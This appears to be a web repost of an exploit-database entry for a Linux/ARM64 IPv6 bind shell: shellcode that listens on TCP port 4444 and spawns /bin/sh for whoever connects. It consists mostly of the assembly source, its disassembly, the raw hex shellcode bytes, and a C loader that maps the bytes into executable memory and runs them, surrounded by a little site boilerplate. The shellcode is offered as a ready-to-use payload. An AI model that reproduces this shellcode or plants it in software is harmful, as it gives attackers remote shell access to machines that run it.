Registerlinuxarm64 bind (4444tcp) shell (binsh) + ipv6 shellcode (176 bytes)
▸▸▸ Exploit & Vulnerability >> shellcode exploit & arm vulnerability
Online Vulnerability Scanner Tools
Code...
/* # Title: Linux/ARM64 - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (176 bytes) # Date: 2019-06-30 # Tested: Ubuntu 16.04 (aarch64) # Author: Ken Kitahara # Compilation: gcc -o loader loader.c ubuntu@ubuntu:~/works$ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu Xenial Xerus (development branch) Release: 16.04 Codename: xenial ubuntu@ubuntu:~/works$ uname -a Linux ubuntu 4.2.0-16-generic #19-Ubuntu SMP Thu Oct 8 15:00:45 UTC 2015 aarch64 aarch64 aarch64 GNU/Linux ubuntu@ubuntu:~/works$ cat ipv6bindshell.s .section .text .global _start _start: // socket(10, 1, 0) mov x0, #0x0a lsr x1, x0, #3 lsl x3, x1, #2 mov x2, xzr mov x8, #198 svc #0x1337 // save fd mvn x4, x0 // bind(fd, &sockaddr, 28) str xzr, [sp, #-8]! str xzr, [sp, #-8]! str xzr, [sp, #-8]! movz x1, #0x0a movk x1, #0x5C11, lsl #16 str x1, [sp, #-8]! add x1, sp, x2 mov x2, #28 mov x8, #200 svc #0x1337 // listen(s, 2) mvn x0, x4 mov x1, x3 mov x8, #201 svc #0x1337 // a = accept(s, 0, 0) mvn x0, x4 mov x1, xzr mov x2, xzr mov x8, #202 svc #0x1337 // save a mvn x4, x0 mov x1, x3 dup3: // dup3(s, 2, 0) // dup3(s, 1, 0) // dup3(s, 0, 0) mvn x0, x4 lsr x1, x1, #1 mov x2, xzr mov x8, #24 svc #0x1337 mov x10, xzr cmp x10, x1 bne dup3 // execve("/bin/sh", 0, 0) mov x3, #0x622F movk x3, #0x6E69, lsl #16 movk x3, #0x732F, lsl #32 movk x3, #0x68, lsl #48 str x3, [sp, #-8]! add x0, sp, x1 mov x8, #221 svc #0x1337 ubuntu@ubuntu:~/works$ as -o ipv6bindshell.o ipv6bindshell.s && ld -o ipv6bindshell ipv6bindshell.o ubuntu@ubuntu:~/works$ objdump -d ./ipv6bindshell ./ipv6bindshell: file format elf64-littleaarch64 Disassembly of section .text: 0000000000400078 <_start>: 400078: d2800140 mov x0, #0xa // #10 40007c: d343fc01 lsr x1, x0, #3 400080: d37ef423 lsl x3, x1, #2 400084: aa1f03e2 mov x2, xzr 400088: d28018c8 mov x8, #0xc6 // #198 40008c: d40266e1 svc #0x1337 400090: aa2003e4 mvn x4, x0 400094: f81f8fff str xzr, [sp,#-8]! 400098: f81f8fff str xzr, [sp,#-8]! 40009c: f81f8fff str xzr, [sp,#-8]! 4000a0: d2800141 mov x1, #0xa // #10 4000a4: f2ab8221 movk x1, #0x5c11, lsl #16 4000a8: f81f8fe1 str x1, [sp,#-8]! 4000ac: 8b2263e1 add x1, sp, x2 4000b0: d2800382 mov x2, #0x1c // #28 4000b4: d2801908 mov x8, #0xc8 // #200 4000b8: d40266e1 svc #0x1337 4000bc: aa2403e0 mvn x0, x4 4000c0: aa0303e1 mov x1, x3 4000c4: d2801928 mov x8, #0xc9 // #201 4000c8: d40266e1 svc #0x1337 4000cc: aa2403e0 mvn x0, x4 4000d0: aa1f03e1 mov x1, xzr 4000d4: aa1f03e2 mov x2, xzr 4000d8: d2801948 mov x8, #0xca // #202 4000dc: d40266e1 svc #0x1337 4000e0: aa2003e4 mvn x4, x0 4000e4: aa0303e1 mov x1, x3 00000000004000e8 <dup3>: 4000e8: aa2403e0 mvn x0, x4 4000ec: d341fc21 lsr x1, x1, #1 4000f0: aa1f03e2 mov x2, xzr 4000f4: d2800308 mov x8, #0x18 // #24 4000f8: d40266e1 svc #0x1337 4000fc: aa1f03ea mov x10, xzr 400100: eb01015f cmp x10, x1 400104: 54ffff21 b.ne 4000e8 <dup3> 400108: d28c45e3 mov x3, #0x622f // #25135 40010c: f2adcd23 movk x3, #0x6e69, lsl #16 400110: f2ce65e3 movk x3, #0x732f, lsl #32 400114: f2e00d03 movk x3, #0x68, lsl #48 400118: f81f8fe3 str x3, [sp,#-8]! 40011c: 8b2163e0 add x0, sp, x1 400120: d2801ba8 mov x8, #0xdd // #221 400124: d40266e1 svc #0x1337 ubuntu@ubuntu:~/works$ objcopy -O binary ipv6bindshell ipv6bindshell.bin ubuntu@ubuntu:~/works$ hexdump -v -e '"\\""x" 1/1 "%02x" ""' ipv6bindshell.bin && echo \x40\x01\x80\xd2\x01\xfc\x43\xd3\x23\xf4\x7e\xd3\xe2\x03\x1f\xaa\xc8\x18\x80\xd2\xe1\x66\x02\xd4\xe4\x03\x20\xaa\xff\x8f\x1f\xf8\xff\x8f\x1f\xf8\xff\x8f\x1f\xf8\x41\x01\x80\xd2\x21\x82\xab\xf2\xe1\x8f\x1f\xf8\xe1\x63\x22\x8b\x82\x03\x80\xd2\x08\x19\x80\xd2\xe1\x66\x02\xd4\xe0\x03\x24\xaa\xe1\x03\x03\xaa\x28\x19\x80\xd2\xe1\x66\x02\xd4\xe0\x03\x24\xaa\xe1\x03\x1f\xaa\xe2\x03\x1f\xaa\x48\x19\x80\xd2\xe1\x66\x02\xd4\xe4\x03\x20\xaa\xe1\x03\x03\xaa\xe0\x03\x24\xaa\x21\xfc\x41\xd3\xe2\x03\x1f\xaa\x08\x03\x80\xd2\xe1\x66\x02\xd4\xea\x03\x1f\xaa\x5f\x01\x01\xeb\x21\xff\xff\x54\xe3\x45\x8c\xd2\x23\xcd\xad\xf2\xe3\x65\xce\xf2\x03\x0d\xe0\xf2\xe3\x8f\x1f\xf8\xe0\x63\x21\x8b\xa8\x1b\x80\xd2\xe1\x66\x02\xd4 */ #include <stdio.h> #include <sys/mman.h> #include <string.h> #include <stdlib.h> int (*sc)(); char shellcode[] = "\x40\x01\x80\xd2\x01\xfc\x43\xd3\x23\xf4\x7e\xd3\xe2\x03\x1f\xaa" "\xc8\x18\x80\xd2\xe1\x66\x02\xd4\xe4\x03\x20\xaa\xff\x8f\x1f\xf8" "\xff\x8f\x1f\xf8\xff\x8f\x1f\xf8\x41\x01\x80\xd2\x21\x82\xab\xf2" "\xe1\x8f\x1f\xf8\xe1\x63\x22\x8b\x82\x03\x80\xd2\x08\x19\x80\xd2" "\xe1\x66\x02\xd4\xe0\x03\x24\xaa\xe1\x03\x03\xaa\x28\x19\x80\xd2" "\xe1\x66\x02\xd4\xe0\x03\x24\xaa\xe1\x03\x1f\xaa\xe2\x03\x1f\xaa" "\x48\x19\x80\xd2\xe1\x66\x02\xd4\xe4\x03\x20\xaa\xe1\x03\x03\xaa" "\xe0\x03\x24\xaa\x21\xfc\x41\xd3\xe2\x03\x1f\xaa\x08\x03\x80\xd2" "\xe1\x66\x02\xd4\xea\x03\x1f\xaa\x5f\x01\x01\xeb\x21\xff\xff\x54" "\xe3\x45\x8c\xd2\x23\xcd\xad\xf2\xe3\x65\xce\xf2\x03\x0d\xe0\xf2" "\xe3\x8f\x1f\xf8\xe0\x63\x21\x8b\xa8\x1b\x80\xd2\xe1\x66\x02\xd4"; int main(int argc, char **argv) { printf("Shellcode Length: %zd Bytes\n", strlen(shellcode)); void *ptr = mmap(0, 0x100, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0); if (ptr == MAP_FAILED) { perror("mmap"); exit(-1); } memcpy(ptr, shellcode, sizeof(shellcode)); sc = ptr; sc(); return 0; }
Linuxarm64 bind (4444tcp) shell (binsh) + ipv6 shellcode (176 bytes) Vulnerability / Exploit Source : Linuxarm64 bind (4444tcp) shell (binsh) + ipv6 shellcode (176 bytes)
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes